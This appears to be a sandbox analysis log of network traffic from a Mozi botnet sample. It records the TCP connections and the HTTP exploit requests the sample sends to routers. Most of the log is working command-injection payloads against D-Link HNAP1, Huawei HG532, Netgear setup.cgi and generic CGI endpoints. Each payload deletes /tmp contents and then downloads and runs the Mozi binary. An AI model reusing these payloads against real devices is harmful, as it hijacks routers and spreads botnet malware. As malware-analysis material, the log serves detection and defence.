Source: global traffic TCP traffic: 192.168.2.23:17816 -> 152.246.68.40:2323
Source: global traffic TCP traffic: 192.168.2.23:56130 -> 180.219.26.95:8080
Source: global traffic TCP traffic: 192.168.2.23:55378 -> 33.47.108.193:5555
Source: global traffic TCP traffic: 192.168.2.23:38972 -> 11.157.135.243:81
Source: /tmp/Mozi.m.3 (PID: 5234) Socket: 0.0.0.0::41039
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.108.37.251:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.1.122.127:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.57.42.173:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 
192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
